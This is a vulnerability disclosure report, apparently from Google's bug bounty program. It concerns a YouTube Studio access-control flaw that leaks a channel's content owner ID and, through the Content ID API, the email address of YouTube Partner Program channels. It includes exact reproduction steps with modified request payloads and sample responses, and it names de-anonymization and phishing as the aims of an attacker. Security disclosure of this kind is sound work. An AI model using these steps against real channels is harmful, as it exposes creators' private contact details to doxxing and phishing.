Summary:
Access control issue in /get_creator_channels leaks channel contentOwnerAssociation, which leads to channel email address disclosure via Content ID API
Program:
Google VRP
URL:
https://www.youtube.com
Vulnerability type:
Permissions Bypass
Details
Access control bug in
studio.youtube.com/youtubei/v1/creator/get_creator_channels
leaks a channel's associated
contentOwnerId
. This
can then be used in the
Content ID API
via
contentOwners.list
to leak the channel's email address at the time it joined the YouTube Partner Program.
Impact:
The disclosure of the email address of channels in the YouTube Partner Program (YPP), including timestamps on when they first joined and last joined YPP.
Core Issues
The
contentOwnerAssociation
of a channel is leaked from
includeSuspended: true
Even though the YouTube Content ID API is only supposed to be accessible by users with a Content Manager account, it's possible to use the API authenticated with a Google account that was tied to a channel during the time the channel joined the YouTube Partner Program
Pre-requisites
Access to a Google account that was tied to a channel during the time the channel join the YouTube Partner Program (required to leak the email address with a
)
Steps to reproduce:
Sign into a Google account with a YouTube channel
Visit
https://studio.youtube.com
Open DevTools > Network
Click the "Earn" tab on the YouTube Studio
A request to
POST /youtubei/v1/creator/get_creator_channels?alt=json
should be seen
Modify the request payload to this request to look as such:
{
"context": {
...
},
"channelIds": [
"[REDACTED_ID]"
],
"mask": {
"channelId": true,
"title": true
"includeSuspended": true
}
Replace the channel ID in
channelIds
with your victim channel ID.
Note,
should not be in the
mask
even though this is what we are leaking. This is because there's a correct access control check  on the mask, but
overrides the response data to include the
even if we aren't authorized to view it.
Send the request and the response should look as such:
"channels": [
"channelId": "[REDACTED_ID]",
"title": "[REDACTED_TITLE]",
"responseStatus": {
"statusCode": "CREATOR_ENTITY_STATUS_OK"
"contentOwnerAssociation": {
"externalContentOwnerId": "[REDACTED_ID]",
"createTime": {
"seconds": "1362270100"
"permissions": {
"canWebClaim": true,
"canViewRevenue": true,
"canEnableCid": false
"isDefaultChannel": true,
"activateTime": {
"seconds": "1637070104",
"nanos": 959438638
]
The target's content owner ID is
[REDACTED_ID]
, the unix timestamp they first joined YouTube Partner Program (YPP) is
1362270100
and they last joined at
1637070104
For channels in a Content Manager (CMS), the
permissions
would be the permissions granted to the channel by the Content Manager.
Sign into a Google account that was tied with a channel when a channel first joined the YouTube Partner Program
If necessary, you can refer to the attached video for the following steps
https://developers.google.com/youtube/partner/reference/rest/v1/contentOwners/list
Click "Try it!" on the Explorer on the right side. Enter the
in the
id
box. Ensure that Google OAuth 2.0 is checked.
Click "Execute", and you would have the target's email address:
"kind": "youtubePartner#contentOwner",
"items": [
"id": "[REDACTED_ID]",
"displayName": "[REDACTED_USERNAME]",
"conflictNotificationEmail": "[REDACTED_EMAIL]"
displayName
is the channel's display name at the time it was monetized.
Additional notes:
While it may initially sound intentional due to the use of the name
partner
, channels in the YouTube Partner Program (YPP) are not supposed to be able to use the Content ID API. This is why the option to enable the Content ID API for a project in
https://cloud.google.com
doesn't show for Google accounts tied to a YPP channel. However, for whatever reason, the endpoint still works via the "Try it!" functionality of the API explorer.
Attack scenario
An attacker with access to a Google account that had a channel that joined the YouTube Partner Program (over 3 million channels) can obtain the email address as well as monetization details of any other channel in the YouTube Partner Program. The attacker can use this to de-anonymize a YouTuber (as there is an expectation of pseudo-anonymity in YouTube), or phish them.